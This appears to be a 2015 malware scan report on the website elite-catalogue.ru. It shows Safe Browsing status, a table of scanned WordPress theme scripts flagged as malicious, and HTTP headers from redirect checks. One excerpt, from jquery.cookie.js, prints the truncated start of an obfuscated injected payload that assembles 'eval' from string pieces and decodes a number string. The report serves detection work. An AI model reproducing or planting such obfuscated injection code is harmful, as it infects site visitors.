Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elite-catalogue.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://elite-catalogue.ru/ | 200 OK Content-Length: 53915 Content-Type: text/html | clean |
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-1.3.1.min.js | 200 OK Content-Length: 58704 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-custom.js | 200 OK Content-Length: 6442 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('a#options').click(function (){ if (($('.layout_options')).is(':hidden')) { $('#wrapper').fadeTo('fast', 0.33); $('.layout_options').fadeIn('normal'); } else { $('#wrapper').fadeTo('fast', 1.0); $('.layout_options').fadeOut('normal'); } }); $('a#reset').click(function() { $('.cat-widget').each( function() {$.cookie($(this).attr('id'), null, { path: '/', expires: 100 }); $(this).show()}); $('.box_a').each( fun Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/tabs.js | 200 OK Content-Length: 12326 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function ddtabcontent(tabinterfaceid){ this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true this.hottabspositions=[] this.currentTabIndex=0 this.subcontentids=[] this.revcontentids=[] this.selectedClassTarget="link" } ddtabcontent.getCookie=function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] retu Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/clear-input.js | 200 OK Content-Length: 4204 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function clearInput (cssClass) { var focusField = $(cssClass); focusField.focus( function(){ var el = $(this); var val = el.val(); if (!el.data('placeholder')) { el.data('placeholder', val); } if(val === el.data('placeholder')) { el.val(''); } }); focusField.blur( function () { var el = $(this); if (el.val() === '') { el.val(el.data('placeholder') || ''); } });< Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery.cookie.js | 200 OK Content-Length: 3456 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports:
| ||
http://elite-catalogue.ru/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57278 Content-Type: application/x-javascript | clean |
http://elite-catalogue.ru/wp-content/themes/wp-comfy/javascript/date.js | 200 OK Content-Length: 4072 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mydate=new Date() var year=mydate.getYear() if (year < 1000) year+=1900 var day=mydate.getDay() var month=mydate.getMonth() var daym=mydate.getDate() if (daym<10) daym="0"+daym var dayarray=new Array("воÑкÑеÑенÑе","понеделÑник","вÑоÑник","ÑÑеда","ÑеÑвеÑг","пÑÑниÑа","ÑÑббоÑа") var montharray=new Array("ÑнваÑÑ","ÑевÑалÑ","маÑÑа","апÑелÑ","мaÑ","иÑнÑ","иÑлÑ","а Antivirus reports:
| ||
http://autocontext.begun.ru/autocontext2.js | 200 OK Content-Length: 249 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19468 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?1818835 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://elite-catalogue.ru/wp-content/plugins/shutter-reloaded/shutter-reloaded.js?ver=2.4 | 200 OK Content-Length: 11499 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var shutterLinks={},shutterSets={};function shutterAddLoad(a){if("undefined"!=typeof jQuery){jQuery(document).ready(a())}else{if(typeof window.onload!="function"){window.onload=a}else{oldonld=window.onload;window.onload=function(){if(oldonld){oldonld()}a()}}}}shutterReloaded={I:function(b){return document.getElementById(b)},settings:function(){var a=this,b=shutterSettings;a.L10n=b.L10n||["Previous","Next","Close","Full Size","Fit to Screen","Image","of","Loading..."];a.imageCount=b.imageCount||0 Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.50 | 404 Not Found Content-Length: 140047 Content-Type: text/html | clean |
http://elite-catalogue.ru/wp-content/plugins/wp-postratings/ | 403 Forbidden Content-Length: 508 Content-Type: text/html | clean |
http://elite-catalogue.ru/test404page.js | 404 Not Found Content-Length: 140001 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elite-catalogue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 03:04:25 GMT
Pragma: no-cache
Server: nginx/1.0.12
Vary: Accept-Encoding
Vary: Cookie,Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aec740103188c44da3d232a8b10220e0; path=/
X-Pingback: http://elite-catalogue.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-XRDS-Location: http://elite-catalogue.ru/?xrds
X-Yadis-Location: http://elite-catalogue.ru/?xrds
GET / HTTP/1.1
Host: elite-catalogue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 03:04:25 GMT
Pragma: no-cache
Server: nginx/1.0.12
Vary: Accept-Encoding
Vary: Cookie,Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aec740103188c44da3d232a8b10220e0; path=/
X-Pingback: http://elite-catalogue.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-XRDS-Location: http://elite-catalogue.ru/?xrds
X-Yadis-Location: http://elite-catalogue.ru/?xrds
Second query (visit from search engine):
GET / HTTP/1.1
Host: elite-catalogue.ru
Referer: http://www.google.com/search?q=elite-catalogue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elite-catalogue.ru
Referer: http://www.google.com/search?q=elite-catalogue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.